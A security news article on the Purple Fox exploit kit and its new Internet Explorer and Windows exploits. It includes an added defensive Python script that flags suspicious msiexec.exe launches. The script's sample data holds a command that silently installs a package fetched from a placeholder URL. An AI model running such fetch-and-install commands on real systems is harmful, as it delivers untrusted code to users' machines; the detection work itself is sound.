Purple Fox Exploit Kit Targets Vulnerabilities Linked to DarkHotel Group

The developers of the Purple Fox exploit kit (EK) have added two new exploits to their arsenal, including one for a vulnerability addressed in February this year.

Initially detailed in September 2018, the EK was designed for the distribution of the Purple Fox Trojan/Rootkit. Previously, the Trojan was disseminated through the RIG EK, but its operators were likely looking to cut costs, Proofpoint’s security researchers note.

In recent distribution campaigns, the Purple Fox EK has been leveraging exploits targeting CVE-2020-0674 (a scripting engine memory corruption in Internet Explorer) and CVE-2019-1458 (a local privilege elevation in Windows), two vulnerabilities that Microsoft addressed in February 2020 and December 2019, respectively.

Before patches were released for these security bugs, however, both were observed being abused in attacks associated with the DarkHotel threat group, which is believed to be linked to the South Korean government. Last year, the threat actor also targeted a Chrome zero-day as part of Operation WizardOpium.

Purple Fox is believed to have affected tens of thousands of users, initially dropping crypto-miners onto compromised machines. Over time, however, it received several improvements, such as the addition of rootkit code and the recently added exploits.

Analysis of the infection chain has revealed the use of a script that first checks the operating system on the target machine to select the method for executing the next-stage payload (via msiexec.exe).

The script also attempts to elevate privileges using exploits for CVE-2018-8120 and CVE-2015-1701, two vulnerabilities in the Win32k multiuser driver. Recent versions of the script also include an exploit for CVE-2019-1458, Proofpoint reveals.
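A defender-side check for the msiexec.exe stage described above, as an added example that is not code from Proofpoint or this article; the parent-process set, the URL and silent-install heuristics, and the sample events are constructed assumptions rather than published Purple Fox indicators:

```python
"""Flag msiexec.exe launches that resemble script-driven payload delivery.

Added example, not from the Proofpoint report or this article. Assumes
process-creation events in Sysmon Event ID 1 style, flattened to dicts;
the heuristics below are assumptions, not published Purple Fox indicators.
"""
from __future__ import annotations
import re

# Parents that should rarely launch the Windows Installer directly (assumption).
SCRIPT_PARENTS = {"iexplore.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"(^|\s)/(qn?|quiet)\b", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, accepting either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    if image_name(ev.get("Image", "")) != "msiexec.exe":
        return []
    parent = image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in SCRIPT_PARENTS:
        reasons.append(f"launched by {parent}")
    if URL_RE.search(cmd):
        reasons.append("package fetched from a URL")
    if reasons and QUIET_RE.search(cmd):
        reasons.append("silent install")  # only meaningful alongside the above
    return reasons


def find_alerts(events: list[dict]) -> dict[str, list[str]]:
    """Map ProcessId -> reasons for every event that scored at least one hit."""
    return {ev["ProcessId"]: r for ev in events if (r := score_event(ev))}


# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\msiexec.exe /V"},
    {"ProcessId": "1002", "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r"msiexec.exe /i http://example.invalid/pkg.msi /qn"},
    {"ProcessId": "1003", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\u\Downloads\tool.msi"'},
]

if __name__ == "__main__":
    for pid, reasons in find_alerts(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The user-initiated install from Downloads (event 1003) is deliberately left unflagged, so the rule keys on the launching context rather than on msiexec.exe alone.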

Although not as prevalent as they once were, exploit kits remain part of the threat landscape and are regularly updated with exploits for more recent vulnerabilities to improve their efficiency, something the Purple Fox EK developers are attempting as well.

The exploits added to the EK’s arsenal, however, target vulnerabilities that were addressed via security updates months ago, which underlines the importance of patching computers in a timely manner.

“The fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business. In essence, the authors behind the Purple Fox malware decided to bring development ‘in-house’ to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism ‘in-house’ also enables greater control over what the EK actually loads,” Proofpoint also notes.

Related: Microsoft Patches IE Zero-Day, 98 Other Vulnerabilities

Related: Microsoft Patches Windows Zero-Day Exploited in Korea-Linked Attacks

Related: New ‘Lord’ Exploit Kit Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
